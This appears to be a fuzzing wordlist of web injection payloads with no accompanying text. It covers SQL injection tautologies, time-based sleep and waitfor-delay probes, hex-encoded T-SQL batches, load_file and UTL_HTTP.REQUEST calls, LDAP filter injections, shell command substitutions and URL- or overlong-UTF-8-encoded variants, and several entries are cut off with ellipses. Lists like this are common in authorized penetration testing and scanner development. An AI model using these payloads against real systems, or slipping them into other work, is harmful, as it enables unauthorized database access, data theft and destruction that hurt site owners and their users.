)%20or%20('x'='x
; execute immediate 'sel' || 'ect us' || 'er'
update
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
delete
like
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
insert
) or ('a'='a
*|
asc
(||6)
) or sleep(__TIME__)='
0
21 %
limit
or 2 > 1
PRINT
hi') or ('a'='a
1;(load_file(char(47,101,116,99,47,112,97,115, ...
declare @s varchar (200) select @s = 0x73656c6 ...
3.10E+17
&
admin' or '
//
truncate
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
||6
%2A%28%7C%28objectclass%3D%2A%29%29
PRINT @@variable
26 %
(sqlvuln)
0x770061006900740066006F0072002000640065006C00 ...
%20'sleep%2050'
as
,@variable
(sqlattempt2)
or (EXISTS)
%20$(sleep%2050)
%20or%20''='
||UTL_HTTP.REQUEST
") or sleep(__TIME__)="
or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
0x77616974666F722064656C61792027303A303A313027 ...
declare @s varchar(22) select @s =
or 2 between 1 and 3
|
or sleep(__TIME__)='
having
a'
declare @s varchar (8000) select @s = 0x73656c ...
char%4039%41%2b%40SELECT
order by
bfilename
or username like char(37);
or 'text' > 't'
(select top 1
or ''='
select
")) or sleep(__TIME__)="
0x730065006c0065006300740020004000400076006500 ...
29 %
(
replace
%7C
&apos;%20OR
declare @q nvarchar (200) select @q = 0x770061 ...
/
declare @q nvarchar (4000) select @q =
desc
||'6
)
select name from syscolumns where id = (sele ...
*(|(mail=*))
distinct
to_timestamp_tz
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
)) or sleep(__TIME__)='
sqlvuln;
28 %
@variable
%2A%7C
?
!
'
x' OR full_name LIKE '%Bob%
'%20or%20''='
')%20or%20('x'='x
') or ('a'='a
or
procedure
handler
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
<>"'%;)(&+
'sqlattempt1
%28
%29
%26
%21
' or ''='
%C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11
